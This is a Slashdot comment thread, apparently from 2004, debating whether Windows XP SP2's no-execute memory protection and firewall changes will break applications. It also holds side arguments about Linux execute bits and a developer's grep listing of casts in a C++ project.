The fact is, Microsoft really doesn't care about quality. As long as people are stupid enough to buy their seriously crummy OS, MS will just patch it up and send it out the door. As long as it boots and doesn't expode in their faces in a nasty fashion, they will ship it. Microsoft's only objective to keep winning in the marketplace, not to create a solid and secure OS with a well-designed user interface. This goes to the rotten heart of Microsoft's corporate ethos, which amounts to this: to sell, at any cost, to any customer anywhere around the globe. Forget about quality, forget about security or the needs of users. And that's why I believe that, in the end, Microsoft will die.

SP2's NX change breaks Mozilla on AMD64

[jesser]

http://bugzilla.mozilla.org/show_bug.cgi?id=233765

exaggeration

Bah... many similar exploits in Linux world... apache recently, for one.

Also: using only the knowledge in your head and the known information about the bitmap problem, demonstrate a means to do ANYTHING useful. The presence of the buffer problem implies the *possible* existence of a working exploit, but the huge majority of attempted exploits will just cause the computer to lock up, or an app to crash. (And prior to XP, causing Windows to crash wasn't really an elite skill... anyone could do it.)

People always act like the existence of an exploit means you can just walk up to any machine and magically take it over... that's ridiculous hype. Even in linux, the system is only as secure as the person using it... you can have all of the theoretical security issues locked up tight, but they mean nothing if your password is taped to the side of the machine.

Re:exaggeration

Bah... many similar exploits in Linux world... apache recently, for one.

Yeah, because everything is Linux vs Microsoft...
Did you completely miss the guy(gal?)'s point?
http://slashdot.org/comments.pl?sid=99517&cid=8485 021

Break "insecure applications"

On the surface, this doesn't sound so bad. If the program is insecure, you don't want it running on your system anyway.

On the other hand, we all know that Microsoft likes to use "secure" as a synonym for "DRM."

Here is a question for the Linux buffs out there

[00RUSS]

What steps has linux put forth to make sure buffer overruns dont happen? I have seen programs that bost that they can detect and fix the error in code (Stackguard). Now, why hasnt GCC implemited this idea. It seems to me protecting it so the code cant buffer overflow AND the kernel cant would fix alot of problems.(Apache)(How to)

insecure applications

[edxwelch]

My guess is when they say "insecure applications have to be re-written", they really mean applications that depend on Microsoft components such as MSHTML. They probably have changed IE to block certain functions for security, which means anyone foolish enough to have based their product around IE now have to invest a lot of money in releasing a version that is compatible with SP2. This process will be repeated probably again when MS release Longhorn. It's amazing that most software houses simply accept this without thinking and continue using MS technologies without thinking about how MS are screwing them around.

No lies

[the_skywise]

I didn't say there wasn't a way to do remote debugging on XPSP2. Microsoft said they had to rewrite their remote debugger to work with XPSP2. I said, "Hey, y'know, I just turn the firewall off."

Second, good for them. When I see the functionality or maybe even if they had documented that functionality as part of their SECURITY CHANGES, I'll shut up about it.

Outlook XP blocked me from viewing ZIP files unless I edited the registry, how is ANY NORMAL user supposed to correct that?!?

FTP makes use of the ports in strange and unconventional ways... riiight. In any event, my complaint is that (and this is gleaning from the Microsoft article) the PROGRAM ITSELF must clear itself with the firewall. Your link doesn't implies that's no longer the case, but if that's true... why rewrite Visual Studio .NET?

Re:No lies

Actually Outlook XP DIDN'T block zip files, this was one of the extensions that was ok, so either you don't know what your doing or you are an end user that doesn't realise your admins are probably doing the blocking, not XP.

Re:Anyone?

[jerw134]

I want them to tell me if an unusual application (not registered in set access and defaults or not a signed system process) tries to access the network.

Actually, they do. The first time a program tries to access the network, a box pops up informing you of this.

WRONG

[achurch]

I'd ignore this troll if it hadn't been incomprehensibly modded Informative . . .

1. A program can call "exec" on any file, whether or not it has the execute bit set. The system does not check

As others have said, bull.

2. Any program with permission to write the file can turn on the execute bit.

Also bull:

user1@mybox:/home/user1> touch foo
user1@mybox:/home/user1> chmod a+w foo
user1@mybox:/home/user1> su user2
Password:
user2@mybox:/home/user1> chmod a+x foo
chmod: changing permissions of `foo': Operation not permitted

Now, I would agree that the execute bit doesn't make for a great security feature, and maybe your description of the origin of the execute bit really is correct, but next time try arguing that without the FUD.

The other alternative is to use a trampoline.

[Ayanami+Rei]

You set up a user called "name_of_uncooperative_program", then put them in the Administrators group, but then go into the security policy editor and prevent that user from logging in interactively (but give it "logon as service").

Then make a batch file that calls "su.exe" using -s to login as a serivce as that account (with password in tow), with the command set to the path to the program.

Set the batch file executable by users, and readable by no one (owned by administrator). Make a shortcut to the program on your desktop or whatever.

Easy!

Re:The other alternative is to use a trampoline.

[myowntrueself]

Not for avp2 it doesn't...
still says 'no disc inserted'.

And Sierra tech support (if you can call it that) are no use; they say it has to be run as admin, no workaround.

And the cracked version I was hoping would help out?

Its just a ripped CD image (a 1:1 image but just that, no real crack).

Windows XP SP2 Could Break Some Applications

[MegaFur]

More FUD at 11.

No, You get a clue

[Tenareth]

UNIX had memory protection on x86 CPUs since MINIX. The OS sucked, now they used hardware to finally make up for their sick oversights.

Oh, I have a great idea... let's make an OS that lets you execute random segments of memory...

Re:The reason MS was ok with 2000, but horrific no

[Zenki]

On X86 platforms VirtualPC emulates in the same manner as VMWare.

Part bullshit

Or half empty. Microsoft embraces "security" partially because it forces the consumer to buy new things.

Duh.

"Security" is the great product of the 21st century...

Do you remember when products had to be "sexy"? Please Lord, take me back.

I want to work...

for the Microsoft Slashdot Response Team too.

No, no, no...

[Baggio]

I'm sick of seeing people make this same mistake over and over. If you ever read the ways they actually tell you to enable the "Real Mode DOS" in Me, you are required to install drivers from the Emergency Boot Disk. The EBD has the EXACT same files as the Win98 boot disk's except for where the name Windows 98 occured... that was changed to Windows Me.

Me itself doesn't have a Real-Mode DOS. It's kinda like the 98Lite solution of using the Windows 95 shell. You aren't running Windows 98 then, you are running a bastardized version of Windows 95. The boot loader for Me has just as much Real-Mode DOS in it as LILO or the NT Boot sector.

Obvious comment about the obvious

[serutan]

Saying a Microsoft OS update could break apps is kind of like saying people could fall off bicycles.

Good

[Kaboom13]

MS is far from perfect, but worrying constantly about reverse compatibility is one of the major reasons windows is so insecure IMO. Microsoft can't take any big leaps in security as long as they have to work around 5 years of hacks and tweaks to keep things working. Microsoft seems to be doing a good job of giving developers fair warning. Furthermore, Windows actually has an excellent method for rolling back service packs, so even if it does break that mission critical app you can roll back and wait for an update.

Re:These are a few insecure programs that won't wo

[Helvick]

Some quick and dirty checks,

Java -I don't use Java for much but just did a run through with Maestro and it seems to manage under pressure, chews up a few 100Meg virtual memory as always but I'm still able to work with the 3D stuff at 20-100fps. That's with IBM Java 1.2 (build wndev20030516.

Java in Firefox. Just to get something more typical I installed Sun's runtime (J2RE 1.4.2_03). No issues with a bunch of web embedded stuff I checked.

Python. Installs and runs some of it's own samples with no issues.

Perl. You didn't ask but I use Perl a lot. No issues with V5.8.3.

All of the above are for XP SP2 V2055 on an IBM T41p (Pentium M) not an AMD64 system where NX flagging is\can be enabled. Microsoft's page on NX (mostly an app issue for SP2) and PAE (mostly a driver issue for SP2) is very informative.

Ridding XP of remote exploits

[freeweed]

You want to rid XP of remote exploits? I already know how. It's devilishly simple:

Turn off all listening ports. Done. Have fun exploiting my box when you can't connect to it. And no, this is not the same as unplugging the ethernet cable :)

For the vast majority of users, they don't need their computer listening unless they explicitly ask. For those that want to run a service, let them, but DON'T MAKE IT A DEFAULT OPTION.

In one fell swoop I've just prevented every remote XP exploit in existence. You're right about the email attachments, but you'll never be able to engineer around a user with superuser privledges running arbitrary executable code.

Bang the DRM softly

[HTH+NE1]

And just whose security are they talking about: ours or theirs?

Re:These are a few insecure programs that won't wo

[BroncoInCalifornia]

Thank you very much!

My bad

[spitzak]

Yes, everybody is right that exec() checks the executable bit.

I was confused by the fact that shells do not check the executable bit. i.e. "sh foo" would run even if foo did not have the bit set. But if the bit was not set, exec would never even get to parsing the #! at the start and calling sh, so it does not matter.

It is also true that you can set things up so a program cannot turn the execute bit on a file it can write. What I meant was a file that it could create and then write.

Re:My bad

[Permission+Denied]

Wanted to mention that I was a bit too rabid in my reply there - didn't realize I was replying to you. This is something like the third time I've flamed you on some technical detail without checking the username. I guess you're open to that when you're one of the few people to post technical stuff on Slashdot :)

Re:Memory protection only on 64-bit platforms for

[spitzak]

Does it remove the protection on other data that happens to be in the same pages?

C++ does not require frequent casts

[Per+Abrahamsen]

And casts are considered "bad style" in C++.

My own current project, a 75k lines of code scientific program, has 9 casts. Three are "static_cast", which does not mean "think of this data as something else", but "convert this data to something else". Two are "dynamic_cast", which is a run-time checked cast. Four are "const_cast" which are problematic. Two of them are for interfacing with an extrenal library, and two actually indicate an internal design problems. Anyway most of the other languages you mentioned doesn't even have "const", so any such design problems will be hidden.

There isn't a single "reinterp_cast", which is the kind of cast that you are talking about. They are not needed or common in "modern" C++ code.

There are no old (C) style casts, I compile with a flag that warns about them.

grep -n -e "_cast" *.C /dev/null
daisy.C:52: if (!dynamic_cast<LogSelect*> (logs[i]))
lexer_data.C:59: const double value = strtod (c_str, const_cast<char**> (&endptr));
log_all.C:278: if (LogSelect* log = dynamic_cast<LogSelect*> (logs[i]))
parser_file.C:198: const double value = strtod (c_str, const_cast<char**> (&endptr));
soil_heat.C:723: tmp[i] = static_cast<double> (impl.state[i]);
syntax.C:322: return static_cast<type> (i);
time.C:179:{ impl.year += static_cast<short> (years); }
traverse.C:131: traverse_alist (syntax, const_cast<AttributeList&> (default_alist),
traverse.C:162: traverse_alist (syntax, const_cast<AttributeList&> (default_alist),